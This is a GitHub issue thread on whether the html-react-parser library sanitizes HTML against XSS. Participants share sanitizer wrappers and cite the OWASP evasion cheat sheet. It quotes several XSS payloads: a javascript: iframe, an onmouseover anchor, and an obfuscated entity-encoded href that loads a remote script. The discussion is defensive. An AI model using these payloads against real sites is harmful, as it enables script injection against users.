remarkablemark / html-react-parser

📝 HTML to React parser.
https://b.remarkabl.org/html-react-parser
MIT License

Does html-react-parser strip out XSS? #94

Closed by dave-stevens-net 5 years ago

dave-stevens-net commented 5 years ago

I want to use html-react-parser to sanitize and parse HTML from my CMS. Does it effectively sanitize the input against XSS attacks? https://stackoverflow.com/questions/29044518/safe-alternative-to-dangerouslysetinnerhtml#answer-48261046 claims that it does. If so, I think it would be great to document / advertise this somewhere in the README. Thanks for your work on this.

remarkablemark commented 5 years ago

Great question @dave-stevens-net!

Unfortunately, it doesn't. The reason is that I chose to make this library flexible rather than strict.

Although there is the replace option, checking against all possible attacks may be too much. I recommend instead using an XSS sanitizer with dangerouslySetInnerHTML.

dave-stevens-net commented 5 years ago

Good to know. Thanks for the quick response.

remarkablemark commented 5 years ago

You're very welcome. If this answers your question @dave-stevens-net, can the issue be closed?

remarkablemark commented 5 years ago

@dave-stevens-net I may have misspoken earlier about this library not being XSS safe.

I originally thought this library wasn't XSS-safe because dangerouslySetInnerHTML was relied on here.

However, it seems that I'm unable to reproduce any XSS vulnerabilities. See my fiddle, which is based off of this example.

Let me know if you have any luck in reproducing XSS attacks.

harveydf commented 5 years ago

I managed to reproduce a simple XSS attack. There might be more.

Check my fiddle.

I found it in here https://www.in-secure.org/misc/xss/xss.html

dave-stevens-net commented 5 years ago

I ended up coding a Sanitize component using the sanitize-html package dependency.

import React from 'react'
import sanitizeHtml from 'sanitize-html'

const Sanitize = ({ html }) => {
    const clean = sanitizeHtml(html, {
        allowedTags: sanitizeHtml.defaults.allowedTags.concat(['img', 'span']),
        allowedAttributes: {
           ...
        },
    })
    return (
        <span
            className="sanitized-html"
            dangerouslySetInnerHTML={{ __html: clean }}
        />
    )
}
export default Sanitize

Example usage:

<Sanitize html={data.wordpressPage.title} />

remarkablemark commented 5 years ago

@harveydf Great find! Thanks for creating and sharing the fiddle.

I'll update the README.md to note that this library isn't XSS safe.

k1sul1 commented 5 years ago

I didn't want to use sanitize-html because it's massive. I used dompurify instead; it's 10 times smaller and doesn't remove CSS.

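import parse, { domToReact } from 'html-react-parser'
import DOMPurify from 'dompurify'
import React from 'react'

// Placeholder for the replace callback (its body was omitted in the original post).
// Returning undefined leaves every node unchanged.
export function replaceNode() {}

// Sanitize the string first, then parse it. Options passed by the caller
// override the default replace callback.
export default function html(input, opts = {}) {
  return parse(DOMPurify.sanitize(input), {
    replace: replaceNode,
    ...opts,
  })
}

html('<iframe src=javascript:alert("xss")></iframe>')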

remarkablemark commented 5 years ago

Thanks for sharing your approach using dompurify @k1sul1!

I created a Repl.it demo based on your example.

xkcdstickfigure commented 1 year ago

> I managed to reproduce a simple XSS attack. There might be more.
>
> Check my fiddle.
>
> I found it in here https://www.in-secure.org/misc/xss/xss.html

Hey, I know this is a pretty old comment, but I just wanted to point out that this isn't actually an XSS issue, since the JavaScript runs within the iframe. If you change the HTML to <iframe src=javascript:alert(location.href)></iframe>, you'll see that the URL it's running on is about:blank rather than the host page's.

alexgleason commented 9 months ago

In the replace function, you can check domNode.name. So wouldn't it be inherently impossible to embed a script tag or iframe if you just check if (['script', 'iframe'].includes(domNode.name)) return null ?

remarkablemark commented 9 months ago

@alexgleason there are many other ways to do XSS without <script> or <iframe>. For example:

<a onmouseover="alert()">xss</a>

Take a look at https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
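
As a rough illustration of the point above, here is a minimal sketch of why a tag-name blocklist does not flag the anchor example. It uses a plain object as a stand-in for the node passed to replace; the name and attribs fields mirror what the thread refers to as domNode.name, while the helper names isBlockedTag and eventHandlerAttributes are hypothetical and not part of html-react-parser.

```javascript
// Tag names the blocklist from the question would reject.
const BLOCKED_TAGS = ['script', 'iframe'];

// Hypothetical helper: true when the node's tag name is on the blocklist.
function isBlockedTag(domNode) {
  return BLOCKED_TAGS.includes(domNode.name);
}

// Hypothetical helper: lists attributes whose names start with "on".
// This is a coarse prefix check, not a complete XSS filter.
function eventHandlerAttributes(domNode) {
  return Object.keys(domNode.attribs || {}).filter((name) =>
    name.toLowerCase().startsWith('on')
  );
}

// Plain object standing in (by assumption) for the node parsed from
// <a onmouseover="alert()">xss</a>.
const anchor = { type: 'tag', name: 'a', attribs: { onmouseover: 'alert()' } };

console.log(isBlockedTag(anchor)); // false
console.log(eventHandlerAttributes(anchor)); // [ 'onmouseover' ]
```

The blocklist lets the anchor through because only its attribute is suspicious. Checking for on* attributes covers this one case, but the cheat sheet linked above lists many others, which is why a dedicated sanitizer is the safer route.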

alexgleason commented 9 months ago

Ahh... that makes sense.

What I'm really trying to figure out is if this library is any worse than dangerouslySetInnerHTML. Is there a new attack surface outside of what's already possible with dangerouslySetInnerHTML?

remarkablemark commented 9 months ago

@alexgleason you should treat this library the same as dangerouslySetInnerHTML if you haven't sanitized the HTML string.

alexgleason commented 9 months ago

Thank you for clarifying. A friend of mine got burned by this one earlier this year, so now I am extra paranoid:

@graf does btrfly support pleroma <a href='\r\nd&#x61t&#x61:text/html,<scr&#x69pt></scr&#x69pt\" src=\"https://i.poastcdn.org/b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117.js\" hidden'></a>

Fortunately I can't reproduce the attack using this library. I just gave it a try.

They were using a custom HTML parser that was vulnerable. This library seems to use the browser's DOMParser when it's available. Therefore, I conclude it's no less secure than using dangerouslySetInnerHTML directly.